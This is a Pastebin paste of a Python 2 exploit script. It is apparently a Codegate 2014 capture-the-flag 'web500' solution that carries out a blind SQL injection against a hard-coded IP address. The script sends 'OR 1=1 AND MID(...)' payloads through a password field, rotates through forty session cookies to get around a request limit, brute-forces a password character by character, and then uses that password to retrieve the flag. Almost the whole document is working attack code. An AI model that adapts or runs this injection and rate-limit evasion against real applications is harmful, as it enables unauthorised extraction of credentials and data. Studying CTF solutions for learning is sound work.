Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #Blind SQL injection Exploit version 1.0
- #Language: Python (2.6)
- #Author: gamma95
- import os
- import sys
- import urllib2
- import struct
- import urllib
- import time
- print """
- Codegate@2014: web500 writeup
- https://twitter.com/xchym
- Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
- """
- if len(sys.argv) != 4:
- print "[+] Syntax Error"
- exit()
- url = sys.argv[1]
- sql = sys.argv[2]
- sqlserver = sys.argv[3]
- def _gen_new_session():
- usock = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
- _cookie = usock.info().get('Set-Cookie')
- return _cookie
- def _get_flag(_session, _password):
- url = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
- user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
- values = {'password':_password}
- headers = { 'User-Agent' : user_agent, 'Cookie': _session }
- data = urllib.urlencode(values)
- req = urllib2.Request(url, data, headers)
- response = urllib2.urlopen(req)
- the_page = response.read()
- return the_page
- def encodeurl(string):
- return string.replace(' ','%20')
- def execute(url, sql, sqlserver):
- _list_session=[]
- for line in xrange(0, 40):
- _list_session.append(_gen_new_session())
- lenght = 9999
- if sqlserver =='mysql':
- str1 = " OR 1=1 AND MID("
- else:
- print "[+] argv[4] = mssql or mysql !!! Plz check your input"
- exit()
- result = ""
- dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
- count = 0
- check = 0
- for i in range(1, 31):
- user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
- kount = 0
- if check == 1:
- break
- for line in dic:
- kount = kount + 1
- flag = 0
- str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
- chuoi = str1 + sql +','+ "1" + str2 + " and '1"
- print chuoi
- values={'password':"123' "+ chuoi}
- data = urllib.urlencode(values)
- #switch to another session for continue bruteforce searching, if not, may be the password will be deleted (over 120 requests limit check)
- headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
- req = urllib2.Request(url, data, headers)
- try:
- response = urllib2.urlopen(req)
- except:
- print "[+] Connection error"
- exit()
- page = response.read()
- len1 = len(page)
- if "True" in page:
- count = count + 1
- result = result + line
- print result
- flag = 1
- break #
- elif kount == len(dic):
- check = 1
- break
- else:
- continue
- print "[+]Done, The password is: " + str(result)
- print "[+]Flag: " + _get_flag(_list_session[count], str(result))
- ##############
- if True:
- print """
- [+] Sending Malicious Request
- [+] Plz wait ... :)
- """
- execute(url, sql, sqlserver)
- else:
- print "Not vul"
- exit()
- exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement